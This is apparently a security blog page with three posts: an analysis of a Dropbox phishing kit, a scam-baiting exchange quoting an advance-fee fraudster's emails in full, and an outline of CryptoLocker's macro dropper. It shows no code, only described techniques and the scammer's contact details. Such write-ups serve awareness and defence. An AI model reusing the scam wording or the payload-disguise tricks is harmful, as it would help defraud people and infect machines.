Skip to content →

Tag: money

Phishing Attack #4 – Dropbox

Clone kit revealed

A new fake Dropbox phishing scam targeting users of the online sharing and storage platform is currently in circulation. The scam invites readers to view files shared by another Dropbox user, and click on a link that redirects to a phishing website. 

screen-shot-2016-10-13-at-11-26-48-am

However, this phishing scam tries to fool users into submitting username and password details of their email address (YAHOO, Outlook, Gmail,AOL or others)  in order to gain access their account.

screen-shot-2016-10-13-at-11-26-57-am

Clicking on the icons a modal pops up asking for credentials.

screen-shot-2016-10-13-at-11-27-16-am screen-shot-2016-10-13-at-11-27-24-am

Once the credentials are filled and the “Submit” button is clicked, the credentials are sent through email to the phisher. 

Analyzing the web server is possible to retrieve the clone kit used by the attacker to create the phishing website. The clone kit is very simple and developed with basic programming skills. Below the structure and the source code of submit.php. “form.php” and “index.php” are 99% composed by HTML code.

screen-shot-2016-10-13-at-11-37-51-am

The developer downloaded all the icons to avoid recon.

screen-shot-2016-10-13-at-11-38-07-am

screen-shot-2016-10-13-at-11-28-32-am

Dropbox can easily identify this phishing attack analyzing the HTTP referer field of the HTTP packet, because the phishing website redirects to the official dropbox website.

 

Leave a Comment

A nice conversation with a “scammer”

“The so-called “419” scam (aka “Nigeria scam” or “West African” scam) is a type of fraud named after an article of the Nigerian penal code under which it is prosecuted. It is also known as “Advance Fee Fraud” because the common principle of all the scam format is to get the victim to send cash (or other items of value) upfront by promising them a large amount of money that they would receive later if they cooperate. In almost all cases, the criminals receive money using Western Union and MoneyGram, instant wire transfer services with which the recipient can’t be traced once the money has been picked up. These services should never be used with people you only know by email or telephone!” (http://www.419scam.org)

Curious about that I started a nice conversation with the Nigerian guy, to see how the scam actually works.

Scammer

Dear Friend,

 I am very happy to inform you about my success in getting that fund transferred. Now I want you to contact my secretary and ask him for a cheque worth of USD$800,000 which I kept for you as a compensation of your past assistance to me. His contact details is below;

Name:   John Izualo.

Email;  ( johnizualo6@yahoo.com )

Kindly reconfirm to him the following below information:

 

Your full name_________

Your address_______

Your country______

Your age__________ 

Your occupation______

Your Phone number_______

 

Note that if you did not send him the above information complete,he will not release the cheque to you because he has to be sure that it is you. Note also that I will not be reached by email or phone at this moment because I am currently in London for investment trip with my share.

Regards,

Dr.Peter Ikey Obi.

Me

Hello I received this mail from Dr.Peter Ikey Obi,

I didn't know how I helped him but I'm very happy to receive this bonus.

here may details for the transfer.

Your full name______Davide XXXX

Your address_______Via dei XXX

Your country_______Italy

Your age___________59

Your occupation______Director Sales at XXX

Your Phone number_______+3934877XXXXX

Regards,

Scammer

 DEAR Davide XXXX,

WELL, I RECEIVE YOUR EMAIL AND ITS CONTENT AND I HAVE MADE SOME INQUIRES ACCORDING TO THE INSTRUCTIONS GIVEN TO ME BY MY BOSS BEFORE HE WENT TO LONDON AND I WANT YOU TO DO ME A FAVOR NOW TOWARDS YOUR FUNDS IN A CERTIFIED BANK CHEQUE ($800,000.00 USD), DO YOU WANT TO RECEIVE IT THROUGH BANK TO BANK WIRING TRANSFER OR DO YOU WANT IT THROUGH DELIVERY FROM COURIER COMPANY, I WANT YOU TO GET BACK TO ME TODAY CONCERNING THIS MATTER! AND IF YOUR CHOICE IS BANK TO BANK WIRING TRANSFER, PLEASE TRY TO FORWARD ME YOUR BANK ACCOUNT INFORMATION BECAUSE THE BANK HERE NEEDS IT TO TRANSFER YOUR FUND INTO YOUR ACCOUNT THERE OK.


BUT IF YOUR CHOICE IS THROUGH COURIER COMPANY, THEN I ALSO WANT YOU TO GET BACK TO ME AS SOON AS POSSIBLE, SO THAT I WILL MAKE THE REMAINING ARRANGEMENT WITH THE COURIER COMPANY HERE CONCERNING HOW TO DELIVERY YOUR CERTIFIED BANK CHEQUE OF $800, 000.00 USD TO YOU, BECAUSE YOUR ADDRESS IS ALREADY RECEIVED HERE OK.

THANKS AND HAPPY TO HEAR BACK FROM YOU,


YOURS SINCERELY,
JOHN IZUALO,
PHONE: +234-806-4228395.

Me

Hello Mr Jhon,

I would like to go through a courier company because I do not have currently my bank account available. What should I do?

Thanks

Best

Scammer

Dear Davide XXXX,
Well, I received your e-mail and its content but inquires I made today stated that delivering your cheque of USD$800,000.00 to you through courier company will only cost you $195.92 for its delivering through FedEx.

and you are required to send the delivering fee of $195.92 through western union or money gram money transfer in the below receiver's name information ok. As soon as you send the fee then get back to me with the MTCN and your cheque of $800, 000.00 must be delivered to you without wasting any time OK.

HERE IS THE RECEIVER'S NAME INFORMATION TO SEND THE REQUIRED FEE OF $195.92 THROUGH WESTERN UNION MONEY TRANSFER OR MONEY GRAM:


RECEIVER'S NAME: PETER NWAKOR

CITY: LAGOS

COUNTRY: NIGERIA

COUNTRY CODE: +234.

TEST QUESTION: IN GOD?

ANSWER: WE TRUST

Thanks,

Mr. John Izualo.

Phone: +234-806-4228395

Me

Hi Thanks a lot.

Tomorrow I will send the money. When I will receive the money?

Do you need more informations to send the money?

Thanks a lot thanks

Best

Everything was working fine and I was so happy to receive my payment of 800K $.

But I made I mistake. I waited too much to make the payment via WU and my Nigerian friend became angry 🙁

He replied to me the following:

Scammer

Am here to inform you that i have tried my best to make sure you receive your cheque, but i cansee that you are not serious about it, failure to compiler with me by the fee today and tomorrow, i will return the cheque to my boss first thing on Monday morning.

The weekend started and I cannot reach out to him anymore. He doesn’t answer anymore. My Yacht has to wait…. maybe the next scam will be the right one!!

Leave a Comment

INSIDE CRYPTOLOCKER C&C SERVER

History

CryptoLocker was a ransomware trojan which targeted computers running Microsoft Windows and was first observed by Dell SecureWorks in September 2013. CryptoLocker propagated via infected email attachments, and via an existing botnet; when activated, the malware encrypts certain types of files stored on local and mounted network drives using RSA public-key cryptography, with the private key stored only on the malware’s control servers. The malware then displays a message, which offers to decrypt the data if a payment (through either Bitcoin or a pre-paid cash voucher) is made by a stated deadline, and threatened to delete the private key if the deadline passes. If the deadline is not met, the malware offered to decrypt data via an online service provided by the malware’s operators, for a significantly higher price in Bitcoin”(Wikipedia)

Infection Process

The CryptoLocker infection process start when the Microsoft Office Word is opened. Microsoft allow users to inject a macro scripting code inside documents, and give the possibility to execute it automatically when the document is opened.

“A macro is a series of commands and actions that help to automate some tasks – effectively a program but usually quite short and simple. However they are created, they need to be executed by some system which interprets the stored commands” (Wikipedia)

Analyzing the documents we received through a suspicious mail we extract the macro inside. The macro used by hackers to infect the machine is a Visual Basic module that is able to create new files inside the TEMP folder and download the real malware from a C&C server through an HTTP GET request. To avoid antivirus detection the malware is represented by a .PNG image containing a VB code inside.

Here is a sample took from the original macro that show how the malware can communicate with his C&C server and how the code is obfuscated.

CODE

Many characters are obfuscated (xx) on purpose. The macro we found inside is a VB macro with many functions to hook the malware and download the real .exe from another server.

After the dropper executes the malware the system is encrypting the personal files with public PGP key and storing the private key in the CC server with time bomb.

 

READ MORE ABOUT THIS ARTICLE HERE —-> DOWNLOAD LINK

Leave a Comment